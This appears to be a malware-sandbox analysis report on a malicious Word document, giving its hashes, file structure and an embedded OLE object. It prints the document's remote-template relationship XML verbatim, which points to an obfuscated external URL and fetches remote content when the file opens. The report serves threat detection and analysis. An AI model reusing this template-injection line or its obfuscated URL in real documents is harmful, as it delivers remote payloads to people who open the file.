Malicious
Malicious

f90a14d5dd596b3d841f4abb3e7da9a0

MS Word Document
|
MD5: f90a14d5dd596b3d841f4abb3e7da9a0
|
Size: 751.12 KB
|
application/msword


Print
Infection Chain
Summary by MalvaGPT
Characteristics
Hash
Hash Value
MD5
f90a14d5dd596b3d841f4abb3e7da9a0
Sha1
5341afa2ffd1f0bd5cfee44b4483e16eda30c77f
Sha256
7cb5533799dcddf3a5dec1ff2833a14ba6ddbfa60c55b1f74dc282d898dceefe
Sha384
dd951bd0715d60a04c0a96ec57d324d64cd994992e6658bb03ebe6a5e00367f8fdf259beac33e1e0fdbd610d104e91d3
Sha512
939c6042da58ae6304ecb8e92b62db365f0d74d341889bd5db9b932ad86a3d001554ffb01e0d6e72a8e8261b99067143550f8a87eca43f6cbb36d2353c3f6f2b
SSDeep
12288:oxOB0lx3gd7rnoXPG0EmB1MLYOoPWLhkkZQHy3bJYs8DVZFn3jfZFOhdH:ok0lx3e7rnoXO0T1ML8UhpFrJHmZFn3K
TLSH
CBF42344E421F40DEF464FFB1F520E46FF6992E13C3E5665A23903B086B0B1A9B66719
File Structure
[Content_Types].xml
_rels
.rels
word
Malicious
_rels
Malicious
document.xml.rels
footer2.xml.rels
document.xml
footnotes.xml
footer3.xml
footer2.xml
header3.xml
endnotes.xml
media
image2.jpeg
image2.jpeg-preview.png
image1.emf
embeddings
oleObject1.bin
Root Entry
Ole
CompObj
ObjInfo
CONTENTS
Text (Preview)
#Stream {6}
#Stream {12}
#Stream {14}
#Stream {13}
#Stream {3}
Structure
theme
theme1.xml
settings.xml
styles.xml
fontTable.xml
webSettings.xml
docProps
core.xml
app.xml
Malware Configuration - Remote Template
Config. Field
Value
Target

https://---------------------------------------------239489435834599345983495934594358@peprolinbot.es/yo6ch1?&--------------------------------------------239489435834599345983495934594358

Path

settings.xml.rels

XPath

/Relationships/Relationship

Outer XML

<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="https://---------------------------------------------239489435834599345983495934594358@peprolinbot.es/yo6ch1?&amp;--------------------------------------------239489435834599345983495934594358" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships" />

Informations
Name
Value
CONTENTS

1.4

CONTENTS

D:20250930114133+01'00'

CONTENTS

PDF Presentation Adobe Photoshop

CONTENTS

D:20250930114134+01'00'

CONTENTS

Adobe Photoshop for Windows -- Image Conversion Plug-in

CONTENTS

D:20250930114133+01'00'

CONTENTS

PDF Presentation Adobe Photoshop

CONTENTS

D:20250930114134+01'00'

CONTENTS

Adobe Photoshop for Windows -- Image Conversion Plug-in

Artefacts
Name
Value
Remote Template - Highly Suspicious

https://---------------------------------------------239489435834599345983495934594358@peprolinbot.es/yo6ch1?&--------------------------------------------239489435834599345983495934594358

f90a14d5dd596b3d841f4abb3e7da9a0 (751.12 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙